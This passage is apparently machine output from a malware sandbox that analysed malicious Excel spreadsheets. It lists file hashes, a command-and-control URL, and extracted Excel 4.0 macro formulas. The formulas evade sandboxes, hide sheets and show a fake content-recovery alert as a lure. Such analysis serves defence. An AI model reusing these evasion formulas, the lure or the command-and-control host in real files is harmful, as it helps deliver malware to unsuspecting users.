Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"fbqFL30feD\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bfabd44feefea8dca3d2b56c7a3eee7a14367c0ccc6c5e493eec21b8b05b0bda"},"analysis":{"reported":"2020-04-09T16:18:43Z","score":10},"files":[{"filename":"bfabd44feefea8dca3d2b56c7a3eee7a14367c0ccc6c5e493eec21b8b05b0bda","filesize":185344,"md5":"3c9ab8fb9e2c96524dba96d109f7aef5","sha1":"528a703fef023c3244e4de5409dd5da44a7465bb","sha256":"bfabd44feefea8dca3d2b56c7a3eee7a14367c0ccc6c5e493eec21b8b05b0bda","sha512":"21d3ab8dbd5d2b8f7b8bd40247a1dffcd14d81fcc80c07fc0a9b88c2e590f5ff777867ff620a67a5f0cd3414601617bcf774e05856d869dae2ba2f8ae3ce3da7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bfabd44feefea8dca3d2b56c7a3eee7a14367c0ccc6c5e493eec21b8b05b0bda.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bfbb9490ba41e59b806fb222e70e29cbae493824680766ba47e13874bcc0ddc9"},"analysis":{"reported":"2020-04-09T16:18:43Z","score":10},"files":[{"filename":"bfbb9490ba41e59b806fb222e70e29cbae493824680766ba47e13874bcc0ddc9","filesize":167936,"md5":"05c277b21c2